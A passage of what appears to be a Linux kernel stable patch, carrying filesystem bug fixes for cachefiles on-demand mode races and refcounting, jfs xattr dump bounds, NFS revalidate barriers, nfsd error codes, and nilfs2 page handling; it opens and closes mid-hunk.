++static inline void cachefiles_ondemand_deinit_obj_info(struct cachefiles_object *obj)
++{
++}
+ #endif
+ 
+ /*
+@@ -367,6 +415,8 @@ do {							\
+ 	pr_err("I/O Error: " FMT"\n", ##__VA_ARGS__);	\
+ 	fscache_io_error((___cache)->cache);		\
+ 	set_bit(CACHEFILES_DEAD, &(___cache)->flags);	\
++	if (cachefiles_in_ondemand_mode(___cache))	\
++		cachefiles_flush_reqs(___cache);	\
+ } while (0)
+ 
+ #define cachefiles_io_error_obj(object, FMT, ...)			\
+diff --git a/fs/cachefiles/ondemand.c b/fs/cachefiles/ondemand.c
+index 0254ed39f68ce..4b39f0422e590 100644
+--- a/fs/cachefiles/ondemand.c
++++ b/fs/cachefiles/ondemand.c
+@@ -4,26 +4,45 @@
+ #include <linux/uio.h>
+ #include "internal.h"
+ 
++struct ondemand_anon_file {
++	struct file *file;
++	int fd;
++};
++
++static inline void cachefiles_req_put(struct cachefiles_req *req)
++{
++	if (refcount_dec_and_test(&req->ref))
++		kfree(req);
++}
++
+ static int cachefiles_ondemand_fd_release(struct inode *inode,
+ 					  struct file *file)
+ {
+ 	struct cachefiles_object *object = file->private_data;
+-	struct cachefiles_cache *cache = object->volume->cache;
+-	int object_id = object->ondemand_id;
++	struct cachefiles_cache *cache;
++	struct cachefiles_ondemand_info *info;
++	int object_id;
+ 	struct cachefiles_req *req;
+-	XA_STATE(xas, &cache->reqs, 0);
++	XA_STATE(xas, NULL, 0);
+ 
+-	xa_lock(&cache->reqs);
+-	object->ondemand_id = CACHEFILES_ONDEMAND_ID_CLOSED;
++	if (!object)
++		return 0;
+ 
+-	/*
+-	 * Flush all pending READ requests since their completion depends on
+-	 * anon_fd.
+-	 */
+-	xas_for_each(&xas, req, ULONG_MAX) {
++	info = object->ondemand;
++	cache = object->volume->cache;
++	xas.xa = &cache->reqs;
++
++	xa_lock(&cache->reqs);
++	spin_lock(&info->lock);
++	object_id = info->ondemand_id;
++	info->ondemand_id = CACHEFILES_ONDEMAND_ID_CLOSED;
++	cachefiles_ondemand_set_object_close(object);
++	spin_unlock(&info->lock);
++
++	/* Only flush CACHEFILES_REQ_NEW marked req to avoid race with daemon_read */
++	xas_for_each_marked(&xas, req, ULONG_MAX, CACHEFILES_REQ_NEW) {
+ 		if (req->msg.object_id == object_id &&
+-		    req->msg.opcode == CACHEFILES_OP_READ) {
+-			req->error = -EIO;
++		    req->msg.opcode == CACHEFILES_OP_CLOSE) {
+ 			complete(&req->done);
+ 			xas_store(&xas, NULL);
+ 		}
+@@ -118,6 +137,7 @@ int cachefiles_ondemand_copen(struct cachefiles_cache *cache, char *args)
+ {
+ 	struct cachefiles_req *req;
+ 	struct fscache_cookie *cookie;
++	struct cachefiles_ondemand_info *info;
+ 	char *pid, *psize;
+ 	unsigned long id;
+ 	long size;
+@@ -168,6 +188,33 @@ int cachefiles_ondemand_copen(struct cachefiles_cache *cache, char *args)
+ 		goto out;
+ 	}
+ 
++	info = req->object->ondemand;
++	spin_lock(&info->lock);
++	/*
++	 * The anonymous fd was closed before copen ? Fail the request.
++	 *
++	 *             t1             |             t2
++	 * ---------------------------------------------------------
++	 *                             cachefiles_ondemand_copen
++	 *                             req = xa_erase(&cache->reqs, id)
++	 * // Anon fd is maliciously closed.
++	 * cachefiles_ondemand_fd_release
++	 * xa_lock(&cache->reqs)
++	 * cachefiles_ondemand_set_object_close(object)
++	 * xa_unlock(&cache->reqs)
++	 *                             cachefiles_ondemand_set_object_open
++	 *                             // No one will ever close it again.
++	 * cachefiles_ondemand_daemon_read
++	 * cachefiles_ondemand_select_req
++	 *
++	 * Get a read req but its fd is already closed. The daemon can't
++	 * issue a cread ioctl with an closed fd, then hung.
++	 */
++	if (info->ondemand_id == CACHEFILES_ONDEMAND_ID_CLOSED) {
++		spin_unlock(&info->lock);
++		req->error = -EBADFD;
++		goto out;
++	}
+ 	cookie = req->object->cookie;
+ 	cookie->object_size = size;
+ 	if (size)
+@@ -176,19 +223,46 @@ int cachefiles_ondemand_copen(struct cachefiles_cache *cache, char *args)
+ 		set_bit(FSCACHE_COOKIE_NO_DATA_TO_READ, &cookie->flags);
+ 	trace_cachefiles_ondemand_copen(req->object, id, size);
+ 
++	cachefiles_ondemand_set_object_open(req->object);
++	spin_unlock(&info->lock);
++	wake_up_all(&cache->daemon_pollwq);
++
+ out:
+ 	complete(&req->done);
+ 	return ret;
+ }
+ 
+-static int cachefiles_ondemand_get_fd(struct cachefiles_req *req)
++int cachefiles_ondemand_restore(struct cachefiles_cache *cache, char *args)
++{
++	struct cachefiles_req *req;
++
++	XA_STATE(xas, &cache->reqs, 0);
++
++	if (!test_bit(CACHEFILES_ONDEMAND_MODE, &cache->flags))
++		return -EOPNOTSUPP;
++
++	/*
++	 * Reset the requests to CACHEFILES_REQ_NEW state, so that the
++	 * requests have been processed halfway before the crash of the
++	 * user daemon could be reprocessed after the recovery.
++	 */
++	xas_lock(&xas);
++	xas_for_each(&xas, req, ULONG_MAX)
++		xas_set_mark(&xas, CACHEFILES_REQ_NEW);
++	xas_unlock(&xas);
++
++	wake_up_all(&cache->daemon_pollwq);
++	return 0;
++}
++
++static int cachefiles_ondemand_get_fd(struct cachefiles_req *req,
++				      struct ondemand_anon_file *anon_file)
+ {
+ 	struct cachefiles_object *object;
+ 	struct cachefiles_cache *cache;
+ 	struct cachefiles_open *load;
+-	struct file *file;
+ 	u32 object_id;
+-	int ret, fd;
++	int ret;
+ 
+ 	object = cachefiles_grab_object(req->object,
+ 			cachefiles_obj_get_ondemand_fd);
+@@ -200,60 +274,114 @@ static int cachefiles_ondemand_get_fd(struct cachefiles_req *req)
+ 	if (ret < 0)
+ 		goto err;
+ 
+-	fd = get_unused_fd_flags(O_WRONLY);
+-	if (fd < 0) {
+-		ret = fd;
++	anon_file->fd = get_unused_fd_flags(O_WRONLY);
++	if (anon_file->fd < 0) {
++		ret = anon_file->fd;
+ 		goto err_free_id;
+ 	}
+ 
+-	file = anon_inode_getfile("[cachefiles]", &cachefiles_ondemand_fd_fops,
+-				  object, O_WRONLY);
+-	if (IS_ERR(file)) {
+-		ret = PTR_ERR(file);
++	anon_file->file = anon_inode_getfile("[cachefiles]",
++				&cachefiles_ondemand_fd_fops, object, O_WRONLY);
++	if (IS_ERR(anon_file->file)) {
++		ret = PTR_ERR(anon_file->file);
+ 		goto err_put_fd;
+ 	}
+ 
+-	file->f_mode |= FMODE_PWRITE | FMODE_LSEEK;
+-	fd_install(fd, file);
++	spin_lock(&object->ondemand->lock);
++	if (object->ondemand->ondemand_id > 0) {
++		spin_unlock(&object->ondemand->lock);
++		/* Pair with check in cachefiles_ondemand_fd_release(). */
++		anon_file->file->private_data = NULL;
++		ret = -EEXIST;
++		goto err_put_file;
++	}
++
++	anon_file->file->f_mode |= FMODE_PWRITE | FMODE_LSEEK;
+ 
+ 	load = (void *)req->msg.data;
+-	load->fd = fd;
+-	req->msg.object_id = object_id;
+-	object->ondemand_id = object_id;
++	load->fd = anon_file->fd;
++	object->ondemand->ondemand_id = object_id;
++	spin_unlock(&object->ondemand->lock);
+ 
+ 	cachefiles_get_unbind_pincount(cache);
+ 	trace_cachefiles_ondemand_open(object, &req->msg, load);
+ 	return 0;
+ 
++err_put_file:
++	fput(anon_file->file);
++	anon_file->file = NULL;
+ err_put_fd:
+-	put_unused_fd(fd);
++	put_unused_fd(anon_file->fd);
++	anon_file->fd = ret;
+ err_free_id:
+ 	xa_erase(&cache->ondemand_ids, object_id);
+ err:
++	spin_lock(&object->ondemand->lock);
++	/* Avoid marking an opened object as closed. */
++	if (object->ondemand->ondemand_id <= 0)
++		cachefiles_ondemand_set_object_close(object);
++	spin_unlock(&object->ondemand->lock);
+ 	cachefiles_put_object(object, cachefiles_obj_put_ondemand_fd);
+ 	return ret;
+ }
+ 
++static void ondemand_object_worker(struct work_struct *work)
++{
++	struct cachefiles_ondemand_info *info =
++		container_of(work, struct cachefiles_ondemand_info, ondemand_work);
++
++	cachefiles_ondemand_init_object(info->object);
++}
++
++/*
++ * If there are any inflight or subsequent READ requests on the
++ * closed object, reopen it.
++ * Skip read requests whose related object is reopening.
++ */
++static struct cachefiles_req *cachefiles_ondemand_select_req(struct xa_state *xas,
++							      unsigned long xa_max)
++{
++	struct cachefiles_req *req;
++	struct cachefiles_object *object;
++	struct cachefiles_ondemand_info *info;
++
++	xas_for_each_marked(xas, req, xa_max, CACHEFILES_REQ_NEW) {
++		if (req->msg.opcode != CACHEFILES_OP_READ)
++			return req;
++		object = req->object;
++		info = object->ondemand;
++		if (cachefiles_ondemand_object_is_close(object)) {
++			cachefiles_ondemand_set_object_reopening(object);
++			queue_work(fscache_wq, &info->ondemand_work);
++			continue;
++		}
++		if (cachefiles_ondemand_object_is_reopening(object))
++			continue;
++		return req;
++	}
++	return NULL;
++}
++
+ ssize_t cachefiles_ondemand_daemon_read(struct cachefiles_cache *cache,
+ 					char __user *_buffer, size_t buflen)
+ {
+ 	struct cachefiles_req *req;
+ 	struct cachefiles_msg *msg;
+-	unsigned long id = 0;
+ 	size_t n;
+ 	int ret = 0;
++	struct ondemand_anon_file anon_file;
+ 	XA_STATE(xas, &cache->reqs, cache->req_id_next);
+ 
++	xa_lock(&cache->reqs);
+ 	/*
+ 	 * Cyclically search for a request that has not ever been processed,
+ 	 * to prevent requests from being processed repeatedly, and make
+ 	 * request distribution fair.
+ 	 */
+-	xa_lock(&cache->reqs);
+-	req = xas_find_marked(&xas, UINT_MAX, CACHEFILES_REQ_NEW);
++	req = cachefiles_ondemand_select_req(&xas, ULONG_MAX);
+ 	if (!req && cache->req_id_next > 0) {
+ 		xas_set(&xas, 0);
+-		req = xas_find_marked(&xas, cache->req_id_next - 1, CACHEFILES_REQ_NEW);
++		req = cachefiles_ondemand_select_req(&xas, cache->req_id_next - 1);
+ 	}
+ 	if (!req) {
+ 		xa_unlock(&cache->reqs);
+@@ -270,38 +398,45 @@ ssize_t cachefiles_ondemand_daemon_read(struct cachefiles_cache *cache,
+ 
+ 	xas_clear_mark(&xas, CACHEFILES_REQ_NEW);
+ 	cache->req_id_next = xas.xa_index + 1;
++	refcount_inc(&req->ref);
++	cachefiles_grab_object(req->object, cachefiles_obj_get_read_req);
+ 	xa_unlock(&cache->reqs);
+ 
+-	id = xas.xa_index;
+-	msg->msg_id = id;
+-
+ 	if (msg->opcode == CACHEFILES_OP_OPEN) {
+-		ret = cachefiles_ondemand_get_fd(req);
++		ret = cachefiles_ondemand_get_fd(req, &anon_file);
+ 		if (ret)
+-			goto error;
++			goto out;
+ 	}
+ 
+-	if (copy_to_user(_buffer, msg, n) != 0) {
++	msg->msg_id = xas.xa_index;
++	msg->object_id = req->object->ondemand->ondemand_id;
++
++	if (copy_to_user(_buffer, msg, n) != 0)
+ 		ret = -EFAULT;
+-		goto err_put_fd;
+-	}
+ 
+-	/* CLOSE request has no reply */
+-	if (msg->opcode == CACHEFILES_OP_CLOSE) {
+-		xa_erase(&cache->reqs, id);
+-		complete(&req->done);
++	if (msg->opcode == CACHEFILES_OP_OPEN) {
++		if (ret < 0) {
++			fput(anon_file.file);
++			put_unused_fd(anon_file.fd);
++			goto out;
++		}
++		fd_install(anon_file.fd, anon_file.file);
+ 	}
+-
+-	return n;
+-
+-err_put_fd:
+-	if (msg->opcode == CACHEFILES_OP_OPEN)
+-		close_fd(((struct cachefiles_open *)msg->data)->fd);
+-error:
+-	xa_erase(&cache->reqs, id);
+-	req->error = ret;
+-	complete(&req->done);
+-	return ret;
++out:
++	cachefiles_put_object(req->object, cachefiles_obj_put_read_req);
++	/* Remove error request and CLOSE request has no reply */
++	if (ret || msg->opcode == CACHEFILES_OP_CLOSE) {
++		xas_reset(&xas);
++		xas_lock(&xas);
++		if (xas_load(&xas) == req) {
++			req->error = ret;
++			complete(&req->done);
++			xas_store(&xas, NULL);
++		}
++		xas_unlock(&xas);
++	}
++	cachefiles_req_put(req);
++	return ret ? ret : n;
+ }
+ 
+ typedef int (*init_req_fn)(struct cachefiles_req *req, void *private);
+@@ -313,20 +448,25 @@ static int cachefiles_ondemand_send_req(struct cachefiles_object *object,
+ 					void *private)
+ {
+ 	struct cachefiles_cache *cache = object->volume->cache;
+-	struct cachefiles_req *req;
++	struct cachefiles_req *req = NULL;
+ 	XA_STATE(xas, &cache->reqs, 0);
+ 	int ret;
+ 
+ 	if (!test_bit(CACHEFILES_ONDEMAND_MODE, &cache->flags))
+ 		return 0;
+ 
+-	if (test_bit(CACHEFILES_DEAD, &cache->flags))
+-		return -EIO;
++	if (test_bit(CACHEFILES_DEAD, &cache->flags)) {
++		ret = -EIO;
++		goto out;
++	}
+ 
+ 	req = kzalloc(sizeof(*req) + data_len, GFP_KERNEL);
+-	if (!req)
+-		return -ENOMEM;
++	if (!req) {
++		ret = -ENOMEM;
++		goto out;
++	}
+ 
++	refcount_set(&req->ref, 1);
+ 	req->object = object;
+ 	init_completion(&req->done);
+ 	req->msg.opcode = opcode;
+@@ -363,8 +503,9 @@ static int cachefiles_ondemand_send_req(struct cachefiles_object *object,
+ 		/* coupled with the barrier in cachefiles_flush_reqs() */
+ 		smp_mb();
+ 
+-		if (opcode != CACHEFILES_OP_OPEN && object->ondemand_id <= 0) {
+-			WARN_ON_ONCE(object->ondemand_id == 0);
++		if (opcode == CACHEFILES_OP_CLOSE &&
++			!cachefiles_ondemand_object_is_open(object)) {
++			WARN_ON_ONCE(object->ondemand->ondemand_id == 0);
+ 			xas_unlock(&xas);
+ 			ret = -EIO;
+ 			goto out;
+@@ -387,7 +528,15 @@ static int cachefiles_ondemand_send_req(struct cachefiles_object *object,
+ 	wake_up_all(&cache->daemon_pollwq);
+ 	wait_for_completion(&req->done);
+ 	ret = req->error;
++	cachefiles_req_put(req);
++	return ret;
+ out:
++	/* Reset the object to close state in error handling path.
++	 * If error occurs after creating the anonymous fd,
++	 * cachefiles_ondemand_fd_release() will set object to close.
++	 */
++	if (opcode == CACHEFILES_OP_OPEN)
++		cachefiles_ondemand_set_object_close(object);
+ 	kfree(req);
+ 	return ret;
+ }
+@@ -430,18 +579,10 @@ static int cachefiles_ondemand_init_close_req(struct cachefiles_req *req,
+ 					      void *private)
+ {
+ 	struct cachefiles_object *object = req->object;
+-	int object_id = object->ondemand_id;
+ 
+-	/*
+-	 * It's possible that object id is still 0 if the cookie looking up
+-	 * phase failed before OPEN request has ever been sent. Also avoid
+-	 * sending CLOSE request for CACHEFILES_ONDEMAND_ID_CLOSED, which means
+-	 * anon_fd has already been closed.
+-	 */
+-	if (object_id <= 0)
++	if (!cachefiles_ondemand_object_is_open(object))
+ 		return -ENOENT;
+ 
+-	req->msg.object_id = object_id;
+ 	trace_cachefiles_ondemand_close(object, &req->msg);
+ 	return 0;
+ }
+@@ -457,16 +598,7 @@ static int cachefiles_ondemand_init_read_req(struct cachefiles_req *req,
+ 	struct cachefiles_object *object = req->object;
+ 	struct cachefiles_read *load = (void *)req->msg.data;
+ 	struct cachefiles_read_ctx *read_ctx = private;
+-	int object_id = object->ondemand_id;
+-
+-	/* Stop enqueuing requests when daemon has closed anon_fd. */
+-	if (object_id <= 0) {
+-		WARN_ON_ONCE(object_id == 0);
+-		pr_info_once("READ: anonymous fd closed prematurely.\n");
+-		return -EIO;
+-	}
+ 
+-	req->msg.object_id = object_id;
+ 	load->off = read_ctx->off;
+ 	load->len = read_ctx->len;
+ 	trace_cachefiles_ondemand_read(object, &req->msg, load);
+@@ -479,13 +611,16 @@ int cachefiles_ondemand_init_object(struct cachefiles_object *object)
+ 	struct fscache_volume *volume = object->volume->vcookie;
+ 	size_t volume_key_size, cookie_key_size, data_len;
+ 
++	if (!object->ondemand)
++		return 0;
++
+ 	/*
+ 	 * CacheFiles will firstly check the cache file under the root cache
+ 	 * directory. If the coherency check failed, it will fallback to
+ 	 * creating a new tmpfile as the cache file. Reuse the previously
+ 	 * allocated object ID if any.
+ 	 */
+-	if (object->ondemand_id > 0)
++	if (cachefiles_ondemand_object_is_open(object))
+ 		return 0;
+ 
+ 	volume_key_size = volume->key[0] + 1;
+@@ -503,6 +638,29 @@ void cachefiles_ondemand_clean_object(struct cachefiles_object *object)
+ 			cachefiles_ondemand_init_close_req, NULL);
+ }
+ 
++int cachefiles_ondemand_init_obj_info(struct cachefiles_object *object,
++				struct cachefiles_volume *volume)
++{
++	if (!cachefiles_in_ondemand_mode(volume->cache))
++		return 0;
++
++	object->ondemand = kzalloc(sizeof(struct cachefiles_ondemand_info),
++					GFP_KERNEL);
++	if (!object->ondemand)
++		return -ENOMEM;
++
++	object->ondemand->object = object;
++	spin_lock_init(&object->ondemand->lock);
++	INIT_WORK(&object->ondemand->ondemand_work, ondemand_object_worker);
++	return 0;
++}
++
++void cachefiles_ondemand_deinit_obj_info(struct cachefiles_object *object)
++{
++	kfree(object->ondemand);
++	object->ondemand = NULL;
++}
++
+ int cachefiles_ondemand_read(struct cachefiles_object *object,
+ 			     loff_t pos, size_t len)
+ {
+diff --git a/fs/jfs/xattr.c b/fs/jfs/xattr.c
+index f9273f6901c8d..07df16ce80064 100644
+--- a/fs/jfs/xattr.c
++++ b/fs/jfs/xattr.c
+@@ -557,9 +557,11 @@ static int ea_get(struct inode *inode, struct ea_buffer *ea_buf, int min_size)
+ 
+       size_check:
+ 	if (EALIST_SIZE(ea_buf->xattr) != ea_size) {
++		int size = min_t(int, EALIST_SIZE(ea_buf->xattr), ea_size);
++
+ 		printk(KERN_ERR "ea_get: invalid extended attribute\n");
+ 		print_hex_dump(KERN_ERR, "", DUMP_PREFIX_ADDRESS, 16, 1,
+-				     ea_buf->xattr, ea_size, 1);
++				     ea_buf->xattr, size, 1);
+ 		ea_release(inode, ea_buf);
+ 		rc = -EIO;
+ 		goto clean_up;
+diff --git a/fs/nfs/dir.c b/fs/nfs/dir.c
+index f594dac436a7e..a5a4d9422d6ed 100644
+--- a/fs/nfs/dir.c
++++ b/fs/nfs/dir.c
+@@ -1792,9 +1792,10 @@ __nfs_lookup_revalidate(struct dentry *dentry, unsigned int flags,
+ 		if (parent != READ_ONCE(dentry->d_parent))
+ 			return -ECHILD;
+ 	} else {
+-		/* Wait for unlink to complete */
++		/* Wait for unlink to complete - see unblock_revalidate() */
+ 		wait_var_event(&dentry->d_fsdata,
+-			       dentry->d_fsdata != NFS_FSDATA_BLOCKED);
++			       smp_load_acquire(&dentry->d_fsdata)
++			       != NFS_FSDATA_BLOCKED);
+ 		parent = dget_parent(dentry);
+ 		ret = reval(d_inode(parent), dentry, flags);
+ 		dput(parent);
+@@ -1807,6 +1808,29 @@ static int nfs_lookup_revalidate(struct dentry *dentry, unsigned int flags)
+ 	return __nfs_lookup_revalidate(dentry, flags, nfs_do_lookup_revalidate);
+ }
+ 
++static void block_revalidate(struct dentry *dentry)
++{
++	/* old devname - just in case */
++	kfree(dentry->d_fsdata);
++
++	/* Any new reference that could lead to an open
++	 * will take ->d_lock in lookup_open() -> d_lookup().
++	 * Holding this lock ensures we cannot race with
++	 * __nfs_lookup_revalidate() and removes and need
++	 * for further barriers.
++	 */
++	lockdep_assert_held(&dentry->d_lock);
++
++	dentry->d_fsdata = NFS_FSDATA_BLOCKED;
++}
++
++static void unblock_revalidate(struct dentry *dentry)
++{
++	/* store_release ensures wait_var_event() sees the update */
++	smp_store_release(&dentry->d_fsdata, NULL);
++	wake_up_var(&dentry->d_fsdata);
++}
++
+ /*
+  * A weaker form of d_revalidate for revalidating just the d_inode(dentry)
+  * when we don't really care about the dentry name. This is called when a
+@@ -2489,15 +2513,12 @@ int nfs_unlink(struct inode *dir, struct dentry *dentry)
+ 		spin_unlock(&dentry->d_lock);
+ 		goto out;
+ 	}
+-	/* old devname */
+-	kfree(dentry->d_fsdata);
+-	dentry->d_fsdata = NFS_FSDATA_BLOCKED;
++	block_revalidate(dentry);
+ 
+ 	spin_unlock(&dentry->d_lock);
+ 	error = nfs_safe_remove(dentry);
+ 	nfs_dentry_remove_handle_error(dir, dentry, error);
+-	dentry->d_fsdata = NULL;
+-	wake_up_var(&dentry->d_fsdata);
++	unblock_revalidate(dentry);
+ out:
+ 	trace_nfs_unlink_exit(dir, dentry, error);
+ 	return error;
+@@ -2609,8 +2630,7 @@ nfs_unblock_rename(struct rpc_task *task, struct nfs_renamedata *data)
+ {
+ 	struct dentry *new_dentry = data->new_dentry;
+ 
+-	new_dentry->d_fsdata = NULL;
+-	wake_up_var(&new_dentry->d_fsdata);
++	unblock_revalidate(new_dentry);
+ }
+ 
+ /*
+@@ -2672,11 +2692,6 @@ int nfs_rename(struct user_namespace *mnt_userns, struct inode *old_dir,
+ 		if (WARN_ON(new_dentry->d_flags & DCACHE_NFSFS_RENAMED) ||
+ 		    WARN_ON(new_dentry->d_fsdata == NFS_FSDATA_BLOCKED))
+ 			goto out;
+-		if (new_dentry->d_fsdata) {
+-			/* old devname */
+-			kfree(new_dentry->d_fsdata);
+-			new_dentry->d_fsdata = NULL;
+-		}
+ 
+ 		spin_lock(&new_dentry->d_lock);
+ 		if (d_count(new_dentry) > 2) {
+@@ -2698,7 +2713,7 @@ int nfs_rename(struct user_namespace *mnt_userns, struct inode *old_dir,
+ 			new_dentry = dentry;
+ 			new_inode = NULL;
+ 		} else {
+-			new_dentry->d_fsdata = NFS_FSDATA_BLOCKED;
++			block_revalidate(new_dentry);
+ 			must_unblock = true;
+ 			spin_unlock(&new_dentry->d_lock);
+ 		}
+@@ -2710,6 +2725,8 @@ int nfs_rename(struct user_namespace *mnt_userns, struct inode *old_dir,
+ 	task = nfs_async_rename(old_dir, new_dir, old_dentry, new_dentry,
+ 				must_unblock ? nfs_unblock_rename : NULL);
+ 	if (IS_ERR(task)) {
++		if (must_unblock)
++			unblock_revalidate(new_dentry);
+ 		error = PTR_ERR(task);
+ 		goto out;
+ 	}
+diff --git a/fs/nfs/nfs4proc.c b/fs/nfs/nfs4proc.c
+index bda3050817c90..ec641a8f6604b 100644
+--- a/fs/nfs/nfs4proc.c
++++ b/fs/nfs/nfs4proc.c
+@@ -4009,6 +4009,23 @@ static void test_fs_location_for_trunking(struct nfs4_fs_location *location,
+ 	}
+ }
+ 
++static bool _is_same_nfs4_pathname(struct nfs4_pathname *path1,
++				   struct nfs4_pathname *path2)
++{
++	int i;
++
++	if (path1->ncomponents != path2->ncomponents)
++		return false;
++	for (i = 0; i < path1->ncomponents; i++) {
++		if (path1->components[i].len != path2->components[i].len)
++			return false;
++		if (memcmp(path1->components[i].data, path2->components[i].data,
++				path1->components[i].len))
++			return false;
++	}
++	return true;
++}
++
+ static int _nfs4_discover_trunking(struct nfs_server *server,
+ 				   struct nfs_fh *fhandle)
+ {
+@@ -4042,9 +4059,13 @@ static int _nfs4_discover_trunking(struct nfs_server *server,
+ 	if (status)
+ 		goto out_free_3;
+ 
+-	for (i = 0; i < locations->nlocations; i++)
++	for (i = 0; i < locations->nlocations; i++) {
++		if (!_is_same_nfs4_pathname(&locations->fs_path,
++					&locations->locations[i].rootpath))
++			continue;
+ 		test_fs_location_for_trunking(&locations->locations[i], clp,
+ 					      server);
++	}
+ out_free_3:
+ 	kfree(locations->fattr);
+ out_free_2:
+diff --git a/fs/nfsd/nfsfh.c b/fs/nfsd/nfsfh.c
+index 8c52b6c9d31a2..3a2ad88ae6481 100644
+--- a/fs/nfsd/nfsfh.c
++++ b/fs/nfsd/nfsfh.c
+@@ -569,7 +569,7 @@ fh_compose(struct svc_fh *fhp, struct svc_export *exp, struct dentry *dentry,
+ 		_fh_update(fhp, exp, dentry);
+ 	if (fhp->fh_handle.fh_fileid_type == FILEID_INVALID) {
+ 		fh_put(fhp);
+-		return nfserr_opnotsupp;
++		return nfserr_stale;
+ 	}
+ 
+ 	return 0;
+@@ -595,7 +595,7 @@ fh_update(struct svc_fh *fhp)
+ 
+ 	_fh_update(fhp, fhp->fh_export, dentry);
+ 	if (fhp->fh_handle.fh_fileid_type == FILEID_INVALID)
+-		return nfserr_opnotsupp;
++		return nfserr_stale;
+ 	return 0;
+ out_bad:
+ 	printk(KERN_ERR "fh_update: fh not verified!\n");
+diff --git a/fs/nilfs2/dir.c b/fs/nilfs2/dir.c
+index 760405da852f6..e9668e455a35e 100644
+--- a/fs/nilfs2/dir.c
++++ b/fs/nilfs2/dir.c
+@@ -186,19 +186,24 @@ static bool nilfs_check_page(struct page *page)
+ 	return false;
+ }
+ 
+-static struct page *nilfs_get_page(struct inode *dir, unsigned long n)
++static void *nilfs_get_page(struct inode *dir, unsigned long n,
++		struct page **pagep)
+ {
+ 	struct address_space *mapping = dir->i_mapping;
+ 	struct page *page = read_mapping_page(mapping, n, NULL);
++	void *kaddr;
+ 
+-	if (!IS_ERR(page)) {
+-		kmap(page);
+-		if (unlikely(!PageChecked(page))) {
+-			if (!nilfs_check_page(page))
+-				goto fail;
+-		}
++	if (IS_ERR(page))
++		return page;
++
++	kaddr = kmap(page);
++	if (unlikely(!PageChecked(page))) {
++		if (!nilfs_check_page(page))
++			goto fail;
+ 	}
+-	return page;
++
++	*pagep = page;
++	return kaddr;
+ 
+ fail:
+ 	nilfs_put_page(page);
+@@ -275,14 +280,14 @@ static int nilfs_readdir(struct file *file, struct dir_context *ctx)
+ 	for ( ; n < npages; n++, offset = 0) {
+ 		char *kaddr, *limit;
+ 		struct nilfs_dir_entry *de;
+-		struct page *page = nilfs_get_page(inode, n);
++		struct page *page;
+ 
+-		if (IS_ERR(page)) {
++		kaddr = nilfs_get_page(inode, n, &page);
++		if (IS_ERR(kaddr)) {
+ 			nilfs_error(sb, "bad page in #%lu", inode->i_ino);
+ 			ctx->pos += PAGE_SIZE - offset;
+ 			return -EIO;
+ 		}
+-		kaddr = page_address(page);
+ 		de = (struct nilfs_dir_entry *)(kaddr + offset);
+ 		limit = kaddr + nilfs_last_byte(inode, n) -
+ 			NILFS_DIR_REC_LEN(1);
+@@ -345,11 +350,9 @@ nilfs_find_entry(struct inode *dir, const struct qstr *qstr,
+ 		start = 0;
+ 	n = start;
+ 	do {
+-		char *kaddr;
++		char *kaddr = nilfs_get_page(dir, n, &page);
+ 
+-		page = nilfs_get_page(dir, n);
+-		if (!IS_ERR(page)) {
+-			kaddr = page_address(page);
++		if (!IS_ERR(kaddr)) {
+ 			de = (struct nilfs_dir_entry *)kaddr;
+ 			kaddr += nilfs_last_byte(dir, n) - reclen;
+ 			while ((char *) de <= kaddr) {
+@@ -387,15 +390,11 @@ nilfs_find_entry(struct inode *dir, const struct qstr *qstr,
+ 
+ struct nilfs_dir_entry *nilfs_dotdot(struct inode *dir, struct page **p)
+ {
+-	struct page *page = nilfs_get_page(dir, 0);
+-	struct nilfs_dir_entry *de = NULL;
++	struct nilfs_dir_entry *de = nilfs_get_page(dir, 0, p);
+ 
+-	if (!IS_ERR(page)) {
+-		de = nilfs_next_entry(
+-			(struct nilfs_dir_entry *)page_address(page));
+-		*p = page;
+-	}
+-	return de;
++	if (IS_ERR(de))
++		return NULL;
++	return nilfs_next_entry(de);
+ }
+ 
+ ino_t nilfs_inode_by_name(struct inode *dir, const struct qstr *qstr)
+@@ -459,12 +458,11 @@ int nilfs_add_link(struct dentry *dentry, struct inode *inode)
+ 	for (n = 0; n <= npages; n++) {
+ 		char *dir_end;
+ 
+-		page = nilfs_get_page(dir, n);
+-		err = PTR_ERR(page);
+-		if (IS_ERR(page))
++		kaddr = nilfs_get_page(dir, n, &page);
++		err = PTR_ERR(kaddr);
++		if (IS_ERR(kaddr))
+ 			goto out;
+ 		lock_page(page);
+-		kaddr = page_address(page);
+ 		dir_end = kaddr + nilfs_last_byte(dir, n);
+ 		de = (struct nilfs_dir_entry *)kaddr;
+ 		kaddr += PAGE_SIZE - reclen;
+@@ -627,11 +625,10 @@ int nilfs_empty_dir(struct inode *inode)
+ 		char *kaddr;
+ 		struct nilfs_dir_entry *de;
+ 
+-		page = nilfs_get_page(inode, i);
+-		if (IS_ERR(page))
+-			continue;
++		kaddr = nilfs_get_page(inode, i, &page);
++		if (IS_ERR(kaddr))
++			return 0;
+ 
+-		kaddr = page_address(page);
+ 		de = (struct nilfs_dir_entry *)kaddr;
+ 		kaddr += nilfs_last_byte(inode, i) - NILFS_DIR_REC_LEN(1);
+ 
+diff --git a/fs/nilfs2/segment.c b/fs/nilfs2/segment.c
+index dfc459a62fb30..04943ab40a011 100644
+--- a/fs/nilfs2/segment.c
++++ b/fs/nilfs2/segment.c
+@@ -1692,6 +1692,7 @@ static void nilfs_segctor_prepare_write(struct nilfs_sc_info *sci)
+ 			if (bh->b_page != bd_page) {
+ 				if (bd_page) {
+ 					lock_page(bd_page);
++					wait_on_page_writeback(bd_page);
+ 					clear_page_dirty_for_io(bd_page);
+ 					set_page_writeback(bd_page);
+ 					unlock_page(bd_page);
+@@ -1705,6 +1706,7 @@ static void nilfs_segctor_prepare_write(struct nilfs_sc_info *sci)
+ 			if (bh == segbuf->sb_super_root) {
+ 				if (bh->b_page != bd_page) {
+ 					lock_page(bd_page);
++					wait_on_page_writeback(bd_page);
+ 					clear_page_dirty_for_io(bd_page);
+ 					set_page_writeback(bd_page);
+ 					unlock_page(bd_page);
+@@ -1721,6 +1723,7 @@ static void nilfs_segctor_prepare_write(struct nilfs_sc_info *sci)
+ 	}
+ 	if (bd_page) {
+ 		lock_page(bd_page);
++		wait_on_page_writeback(bd_page);
+ 		clear_page_dirty_for_io(bd_page);
+ 		set_page_writeback(bd_page);
+ 		unlock_page(bd_page);
+diff --git a/fs/ocfs2/file.c b/fs/ocfs2/file.c
+index cae410568bb2e..f502bb2ce2ea7 100644
+--- a/fs/ocfs2/file.c
++++ b/fs/ocfs2/file.c
+@@ -1937,6 +1937,8 @@ static int __ocfs2_change_file_space(struct file *file, struct inode *inode,
+ 
+ 	inode_lock(inode);
+ 
